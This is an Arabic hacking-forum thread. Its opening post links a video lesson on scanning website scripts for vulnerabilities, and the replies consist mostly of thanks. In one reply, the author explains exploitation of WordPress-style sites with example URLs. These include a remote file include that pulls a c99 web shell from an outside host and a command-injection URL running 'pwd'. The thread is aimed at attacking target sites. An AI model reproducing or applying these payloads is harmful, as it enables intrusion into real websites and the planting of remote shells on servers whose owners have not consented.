السلام عليكم ورحمة الله وبركاتة
بسم الله الرحمن الرحيم
الصلاة والسلام على اشرف المرسلين وخاتم الانبياء سيدنا محمد


درس اليوم هو شرح لكيفية فحص السكربتات من الثغرات,
فحص سكربت موقع الهدف , وفي حال لم يتم التعرف على سكربت موقع الهدف سيتم فحص سكربتات السيرفر
وكل هذا طبعا تم شرحة بالدرس ,طريقة معرفة سكربت موقع الهدف وكذلك سكربتات مواقع السيرفر...الخ
وتم شرح على اكثر من طريقة لفحص السكربتات

على كل حالـ.. وقبل تحميل الدرس

ما هو السكربت ؟؟
باختصار..
السكربت هو نص برمجي مبرمج بعدة لغات مثل: php & asp & ...الخ
وصمم لكي يسهل على مدراء المواقع استخدام الموقع والتحكم بة بسهولة وعدم وجود صعوبات كثيرة ..
وكذلك لترتيب مواضيع الموقع على حسب تقسيم السكربت، فكل سكربت له تقسيم خاصه فيه بالطبع وكل سكربت يختلف عن السكربت الثاني بكل تأكيد.

تماامـ..

لتحميل الدرس من هنا..
http://www.mediafire.com/?3qa6dcncy7kkh2h


حجم الدرس قبل فك الضغط: 12 MB
بعد فك الضغط: 23 MB
وقت الفيديو: 25 دقيقه



اتمنى انه قد كان شرح واضع ومفهوم للجميع..
ولا تنسو من صالح دعائكم..

تحياتي..
اخوكم QtRoNiX FoX

مشكوووور اخي يشرفني اكون اول من يرد على الدرس
تقبل مروري ياغالي

مشكوووور اخي يشرفني اكون اول من يرد على الدرس
تقبل مروري ياغالي

ما شاء الله تباركـ الله
بطل كعادتكـ
ياربي من جد كنت اتعب نفسي
انزل السكربت وروح لي ملف ملف
وابحث عن طريق المفكرة
لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي :tongue:
هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات
اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe
ربي يعطيكــ
بنتظار الدرس القادم .
تحياتي .

مشكوووور اخي يشرفني اكون اول من يرد على الدرس
تقبل مروري ياغالي
هلا فيك حبيبي
بالتوفيق..


ما شاء الله تباركـ الله
بطل كعادتكـ
ياربي من جد كنت اتعب نفسي
انزل السكربت وروح لي ملف ملف
وابحث عن طريق المفكرة
لا و اذا وجدت خطا اقول { اوف باقي المسار } من جد كنت اتعب نفسي :tongue:
هي بسراحه شغلات بسيطه بس الي يطفشك فيها انك تكررها كل شوي وفي جميع الملفات
اما الحين ابي اريح راسي استخدم البرنامج JAAScoisX-Code.exe
ربي يعطيكــ
بنتظار الدرس القادم .
تحياتي .

نورت اخوي 'اخلاقي'
شوف يالغالي..
بخصوص انك بعد ما تلاقي خطأء وتجيلك مشكلة انك كيف تعرف مسار الثغرة عشان تطبقها على الموقع..
هاي سهله جدا, يعني لنفترض انك حملت سكربت وورد برسس عشان تفحصه يدوي على طريقتك انتي(اليدوية), ولنفترض كمان انك وجدت ثغرة داخل ملف wp-settings مثلاا..
وهذا ملف الـwp-settings موجود على الرئيسيه في سكربت وورد برسس ولنفترض كمان انه الموقع مركب السكربت على الرئيسيه مش داخل مجلدات واذا بدك تدخل مثلا على لوحة التحكم تدخل هكذا
www.site.com/wp-login.php
وكمان نفس الشي اذا بدك تستعرض ملف wp-settings رح يكون الاستعراض هكذا
www.site.com/wp-settings.php
وكمان لنفترض انه الدالات المصابه هني على سبيل المثال: qx ودالة اخرى اسمها aljyyosh ونوع الثغرة لنفترض كمان انها ثغرة الفايل انكلود File Include وثغرة الفايل انكلود لازم يكون معك شل بصيغة txt مرفوع موقع عادي
الاستغلال راح يكون هيك:
www.site.com/wp-settings.php?qx=http://c99.gen.tr/c99.txt?
http://c99.gen.tr/c99.txt? :: هذا الشل الي بصيغة تكست
وكمان بنفع يكون الاستغلال هيك:
www.site.com/wp-settings.php?aljyyosh=http://c99.gen.tr/c99.txt?

ونفس الشي اذا كانت الثغرة موجوده داخل مجلد او مجلدات., مثلا داخل هذا المسار wp-content\themes\twentyten والملف المصاب archive مثلا.. والدالة المصابة qx, ونوع الثغرة الكوماند,, الاستغلال رح يكون هيك
www.site.com/wp-content/themes/twentyten/archive.php?qx=pwd
pwd :: امر من وامر الينكس يعرض لك مسارك على السيرفر

بالتوفيق لك اخوي..

مشكووور اخي وبانتظار جديدك يا مبدع :cool:

مشكور أخي الكريم يعطيك العافية وبأنتظار المزيد :)

ماهي غريبة عليك لانك مميز ومبدع بمعنى الكلمة الله لايحرمنا منك يارب

شكراً يا غالي

مشكوووووووووور